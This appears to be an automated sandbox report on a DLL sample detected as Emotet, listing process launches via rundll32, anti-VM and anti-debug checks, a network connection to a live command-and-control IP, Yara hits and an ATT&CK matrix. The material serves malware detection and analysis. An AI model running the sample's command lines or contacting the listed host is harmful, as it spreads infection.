                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DED.tmp
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@36/14@0/1
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6152:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6640
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6028:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: nhlHEF5IVY.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: nhlHEF5IVY.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.915279800.00000000050C5000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915335337.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915454773.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915459206.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915340001.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915541227.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000E.00000003.915459206.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915340001.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915541227.00000000036C7000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.915330304.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915597745.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000E.00000003.915335337.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915454773.00000000036C1000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.924793134.0000000001082000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000E.00000003.915330304.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915597745.00000000036BB000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_009513E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4C6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4C6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00CE13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02DB13E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WerFault.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 3984 Thread sleep time: -150000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.14.dr Binary or memory string: VMware
                      Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.14.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.14.dr Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
                      Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
                      Source: svchost.exe, 0000001B.00000002.1152934438.0000024B21081000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1152331401.0000024B21081000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWp
                      Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.14.dr Binary or memory string: VMware7,1
                      Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: WerFault.exe, 00000011.00000003.959043539.00000000053DB000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.960574300.00000000053DD000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWjv59
                      Source: WerFault.exe, 00000011.00000003.959043539.00000000053DB000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.960574300.00000000053DD000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.960375821.0000000003568000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000003.1146058499.00000000034BA000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000002.1183844764.00000000034BA000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000002.1183823263.0000000003496000.00000004.00000020.sdmp, svchost.exe, 0000001B.00000002.1153046299.0000024B210EC000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.me
                      Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4A1290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_009607D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4BEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4C02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4B9990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4BEC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4C02CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4B9920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4B9920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00CF07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02DC07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_009628D5 LdrInitializeThunk,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 45.63.5.129 187
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340
                      Source: loaddll32.exe, 00000000.00000000.927769327.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.926970530.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.910263558.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.911293400.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.1184012844.00000000038F0000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000000.927769327.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.926970530.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.910263558.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.911293400.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.1184012844.00000000038F0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.927769327.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.926970530.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.910263558.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.911293400.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.1184012844.00000000038F0000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.927769327.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.926970530.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.910263558.0000000001250000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.911293400.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000013.00000002.1184012844.00000000038F0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4BA584 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4BA755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara match File source: 0.2.loaddll32.exe.c13908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.c13908.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.950000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.950000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.rundll32.exe.3053568.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.950000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.rundll32.exe.3053568.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.c13908.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.rundll32.exe.952240.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.950000.9.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.2e60000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.c13908.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.rundll32.exe.a60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.c13908.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.rundll32.exe.952240.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.950000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.rundll32.exe.33c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.ce0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.c13908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.ce0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.rundll32.exe.a60000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.950000.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.c13908.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.c42240.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.c13908.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.c13908.10.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.950000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.loaddll32.exe.c13908.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.c42240.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.rundll32.exe.2db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.2e60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.31734a0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 19.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.31734a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.rundll32.exe.2db0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.911209239.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.961859144.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.907559664.000000000315A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.1013887623.0000000002DB0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.1014042657.000000000303A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.927676600.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.885371581.0000000000CE0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.926867950.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.908120712.0000000002E60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.927582691.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.908789818.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.907514993.0000000000C2A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.910127434.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000003.857679684.0000000000AFB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.909739396.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.908758600.000000000093A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000013.00000003.1123003346.000000000348B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000000.926918217.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.962136592.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Native API 1 | Path Interception | Process Injection 112 | Masquerading 2 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Security Software Discovery 41 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Virtualization/Sandbox Evasion 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories 1 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | System Information Discovery 24 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 532437, Sample: nhlHEF5IVY, Start date: 02/12/2021, Architecture: WINDOWS, Score: 84

Signatures attached to the sample node: Sigma detected: Emotet RunDLL32 Process Creation; Multi AV Scanner detection for submitted file; Yara detected Emotet

Process tree recovered from the graph:

• loaddll32.exe
  • rundll32.exe (signature: Hides that the sample has been downloaded from the Internet (zone.identifier))
    • rundll32.exe
      • rundll32.exe, connects to 45.63.5.129:443 from local port 49794 (AS-CHOOPAUS, United States); signature: System process connects to network (likely due to code injection or exploit)
  • cmd.exe
    • rundll32.exe
      • rundll32.exe
  • rundll32.exe
    • rundll32.exe
  • 3 other processes
    • rundll32.exe
• svchost.exe
  • WerFault.exe
  • WerFault.exe
• svchost.exe
• 3 other processes

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
nhlHEF5IVY.dll | 21% | Virustotal |
nhlHEF5IVY.dll | 18% | ReversingLabs | Win32.Trojan.Phonzy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
0.2.loaddll32.exe.950000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
19.2.rundll32.exe.33c0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.950000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
5.2.rundll32.exe.2e60000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.950000.9.unpack | 100% | Avira | HEUR/AGEN.1110387
4.2.rundll32.exe.ce0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.950000.6.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.9f0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
6.2.rundll32.exe.a60000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.950000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
8.2.rundll32.exe.2db0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
